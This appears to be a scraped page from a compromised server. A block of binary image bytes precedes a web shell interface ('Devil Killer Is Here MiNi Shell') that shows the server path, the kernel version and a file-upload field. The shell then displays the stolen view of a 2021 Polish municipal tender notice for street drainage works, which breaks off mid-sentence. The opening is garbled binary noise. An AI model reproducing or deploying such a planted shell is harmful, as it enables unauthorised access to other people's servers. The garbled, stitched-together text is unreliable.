JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211119/0027590401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Odwodnienie ulic - modernizacja, remonty, konserwacja i czyszczenie&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Łomianki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 1181768394</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 115</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomianki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-092</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@poczta.lomianki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.lomianki.pl/bip/zamowienia-publiczne/lista-postepowan-2021</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Odwodnienie ulic - modernizacja, remonty, konserwacja i czyszczenie&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-71c9c9bb-4861-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00275904</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000996/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.20 Odwodnienie ulic- modernizacja, remonty, konserwacja i czyszczenie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lomianki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lomianki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o<br/>dopuszczenie do udziału w postępowaniu, wymiana informacji<br/>oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą,<br/>z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej<br/>zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020<br/>r. poz. 344).<br/>2. Ofertę, oświadczenia o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych,<br/>w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim<br/>mowa w Rozdziale X pkt. 1 SWZ przekazuje się pod rygorem nieważności<br/>w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym.<br/>3. Szczegółowy zakres i sposób sporządzania i przekazywania ww. dokumentów został określony w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452).<br/>4. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1) drogą elektroniczną: um@poczta.lomianki.pl;<br/>2) poprzez Platformę dostępną pod adresem: https://platformazakupowa.pl/pn/lomianki<br/>5. Pytania do SWZ Wykonawcy przekazują za pośrednictwem platformy o której mowa powyżej.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin&#34;<br/>oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny<br/>z Instrukcją korzystania z Platformy, w szczególności za sytuację, gdy Zamawiający zapozna się z<br/>treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta nie będzie brana<br/>pod uwagę w przedmiotowym postępowaniu.<br/>8. Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych<br/>w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla<br/>Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>9. Zgodnie z 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane<br/>z korzystaniem z Platformy:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych -<br/>MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę<br/>oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.271.35.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót z zakresu odwodnienia ulicznego –modernizacja, remonty, konserwacja, czyszczenie oraz budowa nowych urządzeńodwadniających na terenie Gminy Łomianki, których zakres obejmuje:<br/>1) Oczyszczenie z namułu i innych zanieczyszczeń wpustów burzowych wraz z przykanalikiem zwywozem i utylizacją zanieczyszczeń.<br/>2) Oczyszczenie z namułu i innych zanieczyszczeń studni chłonnych z wywozem i utylizacją zanieczyszczeń.<br/>3) Oczyszczenie z namułu i innych zanieczyszczeń studni rewizyjnych z wywozem<br/>i utylizacją zanieczyszczeń.<br/>4) Oczyszczenie z namułu i innych zanieczyszczeń kanałów deszczowych z wywozem<br/>i utylizacją zanieczyszczeń, inspekcja powykonawcza (kamera inspekcyjna).<br/>5) Wykonanie inspekcji kontrolnej kanałów deszczowych (kamera inspekcyjna).<br/>6) Oczyszczenie z namułu i innych zanieczyszczeń odwodnień liniowych z wywozem<br/>i utylizacją zanieczyszczeń.<br/>7) Oczyszczenie z namułu i innych zanieczyszczeń poboczy utwardzonych płytami ażurowymi<br/>betonowymi (zdjęcie i oczyszczenie płyt ażurowych, wymiana materiału do warstwy<br/>przepuszczalnej, ponowne ułożenie płyt, uzupełnienie kruszywa/żwiru, wywóz i utylizacja<br/>zanieczyszczeń.<br/>8) Oczyszczenie z namułu i innych zanieczyszczeń rowów przydrożnych bez naruszania skarpy<br/>rowu z wywozem i utylizacją zanieczyszczeń.<br/>9) Oczyszczenie z namułu i innych zanieczyszczeń rowów przydrożnych z profilowaniem skarpy<br/>rowu z wywozem i utylizacją zanieczyszczeń.<br/>10) Odtworzenie rowów przydrożnych poprzez przywrócenie przekroju poprzecznego<br/>i głębokości zasypanych rowów, wyprofilowanie skarpy oraz dna rowu, wykonanie warstwy<br/>humusowej o grubości min. 10cm oraz obsianie trawą, wykop do 1,0 m.<br/>11) Wykonanie drenażu - rura drenarska perforowana fi 200 obsypana kruszywem 16-63<br/>w wykopie o szer. 40-60 cm, owinięta geowłókniną igłowatą, wykop do 1,00 m.<br/>12) Wykonanie drenażu - rów wypełniony kruszywem 16-63 owiniętym geowłókniną igłowatą,<br/>wykop do 1,00 m głębokości.<br/>13) Wykonanie studni chłonnej z kręgów betonowych łączonych na zaprawę i uszczelkę<br/>bentonitową o średnicy 1000 mm i głębokości 2 - 2,5 m zagłębionej min. 0,5 m w warstwie<br/>gruntu przepuszczalnego, wypełniona warstwą żwiru lub kruszywa łamanego 31,5-63 mm<br/>grubości 40 cm oraz warstwą filtracyjną z przekładką z geowłókniny z piasku grubego o grubości<br/>30 cm, właz klasy D400 zlicowany z niweletą terenu, zagęszczenie gruntu, odtworzenie terenu<br/>do stanu pierwotnego.<br/>14) Wykonanie studni rewizyjnej z kręgów betonowych z kręgów betonowych łączonych na<br/>zaprawę i uszczelkę bentonitową o średnicy 1000 mm i głębokości 2 -2,5 m, dno monolityczne z<br/>betonu B-15 grubości 25 cm, właz klasy D400 zlicowany z niweletą terenu, odtworzenie terenu<br/>do stanu pierwotnego.<br/>15) Wykonanie studni chłonnej z kręgów betonowych łączonych na zaprawę i uszczelkę<br/>bentonitową o średnicy 1200 mm i głębokości 2 - 2,5 m zagłębionej min. 0,5 m w warstwie<br/>gruntu przepuszczalnego, wypełniona warstwą żwiru lub kruszywa łamanego 31,5-63 mm<br/>grubości 40 cm oraz warstwą filtracyjną z przekładką z geowłókniny z piasku grubego o grubości<br/>30 cm, właz klasy D400 zlicowany z niweletą terenu, zagęszczenie gruntu, odtworzenie terenu<br/>do stanu pierwotnego.<br/>16) Wykonanie studni rewizyjnej z kręgów betonowych z kręgów betonowych łączonych na<br/>zaprawę i uszczelkę bentonitową o średnicy 1200 mm i głębokości 2 -2,5 m, dno monolityczne z<br/>betonu B-15 grubości 25 cm, właz klasy D400 zlicowany z niweletą terenu, odtworzenie terenu<br/>do stanu pierwotnego.<br/>17) Wykonanie przykanalika do studni chłonnej bądź rewizyjnej z rury PCV o średnicy 160 mm,<br/>odtworzenie terenu do stanu pierwotnego.<br/>18) Wykonanie przykanalika do studni chłonnej bądź rewizyjnej z rury PCV o średnicy 160-200<br/>mm, odtworzenie terenu do stanu pierwotnego.<br/>19) Wykonanie studzienki ściekowej z wpustem żeliwnym i osadnikiem, odtworzenie terenu do<br/>stanu pierwotnego.<br/>20) Wykonanie odwodnienia liniowego betonowego, szer. 200 mm, D400, H100, z pokrywą<br/>żeliwną.<br/>21) Wykonanie ścieku przykrawężnikowego z kostki betonowej grubości 8 cm lub gotowych<br/>elementów betonowych na podsypce z wypełnieniem spoin.<br/>22) Wykonanie odwodnienia w postaci skrzynek rozsączających przeznaczonych pod ruch<br/>pieszych z systemem inspekcyjno konserwatorskim oraz odpowietrzeniem, posadowionych na zagęszczonym podłożu, owiniętych geowłókniną i obsypanych kruszywem lub żwirem 8-16,<br/>wykonanie prac ziemnych.<br/>23) Wykonanie odwodnienia w postaci skrzynek rozsączających przeznaczonych pod ruch<br/>pojazdów ciężarowych (SLW60) z systemem inspekcyjno konserwatorskim oraz<br/>odpowietrzeniem, posadowionych na zagęszczonym podłożu, owiniętych geowłókniną<br/>i obsypanych kruszywem lub żwirem 8-16, wykonanie prac ziemnych.<br/>24) Wymiana warstwy rozsączającej/filtrującej pobocza chłonnego (kruszywo łamane 16-63) z<br/>wywozem wymienionego materiału.<br/>25) Wymiana warstwy rozsączającej/filtrującej studni chłonnej (żwir lub kruszywo łamane 31,5-<br/>63) z wywozem wymienionego materiału.<br/>26) Wymiana uszkodzonej pokrywy włazu żeliwnego studni chłonnej D400, 400x600<br/>27) Wymiana włazu żeliwnego studni chłonnej D400, 400x600, odtworzenie terenu do stanu<br/>pierwotnego.<br/>28) Regulacja pionowa włazu żeliwnego studni chłonnej D400, odtworzenie terenu do stanu<br/>pierwotnego.<br/>29) Wymiana uszkodzonej pokrywy włazu żeliwnego studni kanalizacyjnej D400, fi 1000<br/>30) Wymiana włazu żeliwnego studni kanalizacyjnej D400 fi 1000, odtworzenie terenu do stanu<br/>pierwotnego.<br/>31) Wymiana uszkodzonej pokrywy włazu żeliwnego studni kanalizacyjnej D400, fi 1200<br/>32) Wymiana włazu żeliwnego studni kanalizacyjnej D400 fi 1200, odtworzenie terenu do stanu<br/>pierwotnego.<br/>33) Regulacja pionowa włazu żeliwnego studni kanalizacyjnej D400, odtworzenie terenu do<br/>stanu pierwotnego.<br/>34) Wymiana uszkodzonej kratki wpustu burzowego D400, 400x600.<br/>35) Wymiana kompletnego wpustu burzowego D400, 400x600, odtworzenie terenu do stanu<br/>pierwotnego.<br/>36) Regulacja pionowa wpustu burzowego D400, 400x600, odtworzenie terenu do stanu<br/>pierwotnego.<br/>3. Szczegółowy opis oraz sposób realizacji zamówienia zawiera Opis Przedmiotu Zamówienia, stanowiący Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111240-2 - Roboty w zakresie odwadniania gruntu</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45112200-7 - Usuwanie powłoki gleby</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp do 50% szacowanej wartości zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji przystąpienia do wykonania prac liczony od dnia zlecenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek jeżeli wykaże, że wykonał należycie dwie roboty budowlane<br/>polegające na wykonaniu konserwacji lub czyszczenia odwodnień ulicznych o wartości co<br/>najmniej 50 000,00 zł brutto (pięćdziesiąt tysięcy złotych 00/100) w przypadku każdej z tych<br/>robót, wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie.<br/>b) Wykonawca spełni warunek jeżeli wykaże, że wykonał należycie dwie roboty budowlane<br/>polegające na wykonaniu modernizacji lub remontu urządzeń odwodnienia ulicznego o wartości<br/>co najmniej 50 000,00 zł brutto (pięćdziesiąt tysięcy złotych 00/100) w przypadku każdej z tych<br/>robót, wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie.<br/>c) Wykonawca spełni warunek jeżeli wykaże, że na okres realizacji zamówienia będzie<br/>dysponował jedną osobą posiadającą uprawnienia budowlane do sprawowania samodzielnych<br/>funkcji w budownictwie do kierowania robotami budowlanymi w specjalności sanitarnej i<br/>należącą do właściwej Izby Samorządu Zawodowego Ww. osoba skierowana do realizacji<br/>zamówienia ma posiadać opłacone składki w odpowiednich Okręgowych Izbach Inżynierów<br/>Budownictwa oraz aktualne na czas realizacji zamówienia ubezpieczenie od odpowiedzialności<br/>cywilnej w zakresie pełnienia ww. funkcji.<br/>d) Wykonawca spełni warunek jeżeli wykaże że na okres realizacji zamówienia będzie dysponował narzędziami typu:<br/>a. pojazd próżniowo-ssący – 1 szt.<br/>b. łopaty – 2 szt.<br/>c. szufle – 2 szt.<br/>d. wiadra – 2 szt.<br/>e. pojazd z urządzeniem ssąco-tłoczącym do ciśnieniowego czyszczenia przewodów<br/>kanalizacyjnych – 1 szt.<br/>f. koparka – 1 szt.<br/>g. samochód samowyładowawczy – 1 szt.<br/>h. kamera inspekcyjna – 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku<br/>o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>2) Oświadczenia Wykonawcy o aktualności informacji zawartych w świadczeniu, o którym mowa w art. 125 ust 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3) Wykazu robót budowlanych w których Wykonawca wykaże, że wykonał należycie dwie roboty budowlane polegające na wykonaniu konserwacji lub czyszczenia odwodnień ulicznych o wartości co najmniej 50 000,00 zł brutto (pięćdziesiąt tysięcy złotych 00/100) w przypadku każdej z tych robót, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy 